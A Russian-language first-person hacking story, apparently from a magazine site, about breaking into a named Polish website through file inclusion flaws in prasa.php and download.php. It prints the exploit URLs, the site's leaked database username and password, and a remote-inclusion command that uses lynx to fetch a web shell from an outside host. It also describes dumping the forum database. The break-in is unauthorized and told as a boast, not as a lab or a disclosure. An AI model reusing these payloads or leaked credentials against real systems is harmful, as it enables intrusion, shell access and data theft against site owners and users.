На днях в асю стукнул знакомый с вопросом, что можно сделать с локальной
инклудой. Я прекрасно помнил, как в свое время,
найдя баг в
Search Engine & Directory Powered by Turbo Seek от FocalMedia.Net, взломал
www.uscomputer.net. Там была возможность чтения произвольных файлов с правами
сервера, найдя пароль в .htpasswd и расшифровав его я получил доступ к сайту. Я
объяснил знакомому механизм, но минут через 5 он стукнул вновь и сказал, что у
него ни чего не выходит. Тогда я попросил у него URL что бы разобраться на
месте. Это был польский сайт
www.sacriversum.com.

Первым в глаза бросился форум phpBB неизвестно какой версии, я решил его
инжектить, но эксплойты не действовали. Снифание админских куков я решил
оставить на потом. Тогда я занялся локальной инклудой. Параметр text скрипта
prasa.php позволял читать любые файлы:

http://www.sacriversum.com/prasa.php?text=../../../../etc/passwd ,

но ни .htpasswd, ни service.pwd тут не оказалось. Попробовал я внешнюю инклуду,
но вместо результата выполнения команды увидел исходный код своего шелла. Тут же
сразу возникла идея вывести содержимое форумного config.php, выполнив запрос

http://www.sacriversum.com/prasa.php?text=./forum/config.php

и глянув исходный код страницы я получил заветный логин и пассворд для конекта к
MySQL:

<?php
//
// phpBB 2.x auto-generated config file
// Do not change anything in this file!
//
$dbms = ‘mysql’;
$dbhost = ‘localhost’;
$dbname = ‘sacriversum’;
$dbuser = ‘mackozer’;
$dbpasswd = ‘turambar’;
$table_prefix = ‘phpbb_’;
define(‘PHPBB_INSTALLED’, true);
?>

Попробовал подключиться с этими данными к фтп и был послан, пароль не подходил.
Стал изучать сайт дальше и нашел чудесный скрипт download.php, который
инклудился без проблем:
 
http://www.sacriversum.com/download.php?plik= http://xxx.narod.ru/sh.php&cmd=id

Оставалось только найди папку доступную на запись и залить веб-шелл. Папка такая
нашлась сразу, заботливая рука админа выставила ей разрешение на запись:

drwxrwxrwx 4 mackozer mackozer 512 Apr 17 08:54 revenger/

Оставалось только найти чем закачать свое добро. На серваке кроме lynx не
оказалось больше ничего. Пришлось искать мануал по lynx, кстати русскоязычных я
практически не нашел. В конце концов я залил полноценный шелл:

http://www.sacriversum.com/download.php?plik= http://xxx.narod.ru/sh.php&cmd=lynx
-source http://xxx.narod.ru/fags.php > ./revenger/fags.php

а также сдампил базу форума, может на что сгодится. Потом поэтапно разъяснил
знакомому как и что делал.

Не ахти какой взлом, но он еще раз подтверждает истину: "кто ищет, тот
найдет".

А девелоперы все таки рулят!

Оставить мнение

Check Also

Алмазный фонд «Хакера». Самые крутые материалы по реверсингу и malware за три года

Иногда мы, редакторы и авторы «Хакера», сами читаем «Хакер». Нет, ну то есть мы постоянно …